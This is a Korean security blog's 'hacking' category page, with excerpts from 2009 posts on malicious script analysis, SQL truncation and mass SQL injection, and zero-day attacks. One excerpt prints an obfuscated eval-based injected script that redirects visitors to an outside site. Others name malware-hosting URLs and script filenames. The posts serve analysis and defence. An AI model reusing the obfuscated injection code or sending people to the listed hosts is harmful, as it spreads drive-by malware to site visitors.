본문 바로가기

해킹190

728x90
여러가지 취약점으로 공격하는 악성 스크립트 분석 출처 : http://malwarelab.tistory.com/ 엊그제 네x버의 SecurityPlus 까페에 갔다가 획득하게 된 파일들입니다. 다운 받은 파일은 html과 js 파일이었는데 결국 하나의 파일을 통해 iframe이나 script로 연결된 파일들이었습니다. 가장 먼저 나오는놈부터 보겠습니다. help.htm bir.js 파일이 script 태그를 통해 삽입되고 있습니다. 바로 아래에는 익숙한 도메인이 보이는군요.. 현재 두번째 스크립트는 스크립트로써 동작하지 않고 그냥 텍스트 형태로 문자열만 보이고 있습니다. 그럼 bir.js 파일을 보도록 하겠습니다. 그냥 딱 보기에도 악성스크립트인게 보입니다. 정상적인 스크립트라면 이런식으로 인코딩하지 않겠죠.. 뭔가 구린게 있으니 인코딩을 하는거겠죠?.. 2009. 3. 5.
해외에서 삽입한 악성코드 아닌 광고코드 분석 관리중인 모 사이트에 아래와 같은 악성코드는 아닌 광고코드가 삽입되었으며, 침해 분석 결과 해외 아이피로 확인되었음. 일단 침해된 방법에 대해서는 차단하였으나 추가적인 시도 가능성 모니터링 필요. -- 삽입코드 -- 정상 코드로 변환하여.. -- 원형 코드 -- 추가 다운로드 코드 (bidch.js) -- que 입력값 : test -- 소스 코드 -- function f(str) { z="ion='"; d="win"; c="cat"; f7=str; b="dow.lo"; g="';"; i=7; j=21; if (j-14==i) eval(d+b+c+z+f7+g); } f('http://bestforyou.if.ua/feed/search.php?q=test'); -- 원형 코드 -- window.locati.. 2009. 3. 3.
새로운 SQL 잘라내기 공격 및 대처 방법 2006년 http://msdn.microsoft.com/ko-kr/magazine/cc163523.aspx 2008년 http://www.dbguide.net/know/know109001.jsp SQL 주입을 이용하는 공격은 방화벽과 침입 검색 시스템을 통과해서 데이터 계층을 손상시킬 수 있다는 점 때문에 많은 관심을 끌었습니다. 기본 코드 패턴을 보면 1차 또는 2차 주입 모두 문을 생성할 때 신뢰할 수 없는 데이터를 사용한 경우에 발생하는 다른 주입 문제와 비슷합니다. 대부분의 개발자는 백 엔드에서 매개 변수가 있는 SQL 쿼리를 저장 프로시저와 함께 사용하여 웹 프런트 엔드의 취약점을 완화하고 있지만, 사용자 입력 기반의 DDL(데이터 정의 언어) 문을 생성하는 경우 또는 C/C++로 작성된 응용.. 2009. 3. 2.
Ms Word / Internet Explorer 제로데이 공격분석 최신의 보안패치를 적용하고, 보안 프로그램들을 최신 버전으로 유지하더라도 웹 서핑을 하는 것만으로도 PC에 트로잔이 설치될 수가 있다. 바로 제로데이 취약점을 이용한 공격으로 가능한 일이다. 이 연재는 제로데이에 대한 정확한 이해와 분석을 통해 제로데이 공격을 어떻게 예방할 수 있는지에 대해 알아보는데 목적이 있다. 이번호에서는 제로데이 공격에 대해 직접 확인하고, 분석하는 방법에 대해서 알아보며, 최근에 발생되었던 제로데이 공격을 분석해 제로데이 공격에 대한 이해를 높이도록 한다. 최근의 표적형 제로데이 공격들의 경우 대중에 많이 알려진 공격들이 아니기 때문에, 분석을 위해서는 공격에 대한 샘플 확보와 정보수집이 무엇보다도 중요하다. 샘플 확보의 경우, 일반인들이 쉽게 공격 샘플을 확보할만한 방법이 뚜.. 2009. 2. 28.
Mass SQL Injection 대한 자료 모음 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다. 현재 악성코드의 name별로 꾸준히 찾아서 포스팅하려고 했으나, 이게 엄청나게 많군요. |g.js| |m.js| |4.js| |3.js| |2.js| |1.js| |ip.js| |jp.js| |fuckjp.js| |fjp.js| |a.js| |ads.js| js 확장자로 만 이루어 진게 대략 이정도 이군요. 또한, 계속 파일명이 바뀌고 있습니다. Google의 도움을 빌어 "약 1,250,000개 결과(한국어 적용시 약 60,500개)"를 얻을 수 있습니다. 악성코드 출처는 대략 아래와 같습니다. (Google에서 확인) http://www.killwow1.cn/g.js (약 1,.. 2009. 2. 27.
728x90
728x90